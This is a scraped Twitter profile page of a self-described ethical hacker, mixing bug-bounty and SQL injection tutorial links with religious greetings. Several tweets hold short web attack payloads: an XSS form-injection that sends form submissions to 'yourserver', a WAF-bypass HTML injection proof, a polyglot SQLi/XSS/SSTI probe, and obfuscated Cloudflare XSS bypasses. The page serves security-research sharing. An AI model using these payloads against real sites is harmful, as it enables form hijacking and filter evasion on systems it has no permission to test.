Pavandeep

@Pavandep8

Ethical Hacker, Security Researcher

India
Vrijeme pridruživanja: travanj 2018.

Tweetovi

Blokirali ste korisnika/cu @Pavandep8

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @Pavandep8

  1. proslijedio/la je Tweet
    29. sij

    If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.

    Prikaži ovu nit
    Poništi
  2. 27. sij

    Look what I shared: [ Writeup — Bugbounty Facebook ] Disclosure the verified phone number in Checkpoint. |

    Poništi
  3. proslijedio/la je Tweet
    21. sij

    The web framework Django used to use this flawed CSRF defence, which once exposed to attack. Check out this lab on our Web Security Academy to learn how:

    Poništi
  4. proslijedio/la je Tweet
    14. sij

    Voting is now open for the top 10 new web hacking techniques of 2019:

    Poništi
  5. 14. sij

    Look what I shared: SQL Injection Error Based with Extractvalue - MII Cyber Security Consulting Services - Medium |

    Poništi
  6. 4. sij
    Poništi
  7. 3. sij

    Look what I shared: How to Perform Manual SQL Injection While Pentesting With Single quote Error Based Parenthesis… |

    Poništi
  8. proslijedio/la je Tweet
    28. pro 2019.
    Poništi
  9. Poništi
  10. 11. pro 2019.
    Poništi
  11. proslijedio/la je Tweet
    7. pro 2019.

    Onions Might Be Expensive ! But Guru Ka Langar Continues! Dhan Sikhi!

    Poništi
  12. 6. pro 2019.
    Poništi
  13. proslijedio/la je Tweet
    26. stu 2019.

    Classical WAF Bypass Inline HTMLi + Strip Tags Code: <a href="<?=strip_tags($_GET['url']);?>"> PoC: ?url="onm<>ouseover="ale<>rt(1) 😎

    Poništi
  14. proslijedio/la je Tweet
    25. stu 2019.

    If I want to quickly, manually spray an application input, I use this payload: '"><svg/onload=alert()>{{7*7}} It's fairly short, and will give indicators of basic SQLi, XSS and SSTI vulnerabilities. Disclaimer: This isn't a replacement for proper testing.

    Poništi
  15. 23. stu 2019.

    Look what I shared: SQL Injection Step By Step Part 1 - Nilesh Sanyal - Medium |

    Poništi
  16. 13. stu 2019.

    Today, on the very special occasion of the 550th Prakash Parv of Shri Guru Nanak Dev Ji, my greetings to everyone. This is a day to rededicate ourselves to fulfilling Shri Guru Nanak Dev Ji’

    Poništi
  17. proslijedio/la je Tweet

    Today, on the very special occasion of the 550th Prakash Parv of Shri Guru Nanak Dev Ji, my greetings to everyone. This is a day to rededicate ourselves to fulfilling Shri Guru Nanak Dev Ji’s dream of a just, inclusive and harmonious society.

    Poništi
  18. 6. stu 2019.
    Poništi
  19. proslijedio/la je Tweet
    28. lis 2019.
    Poništi
  20. proslijedio/la je Tweet

    cloudflare `XSS´ success, red dot. 🎃 « <svg onload\r\n=$.globalEval("al"+"ert()");> » « <svg/onload=self[`aler`%2b`t`]`1`> »

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·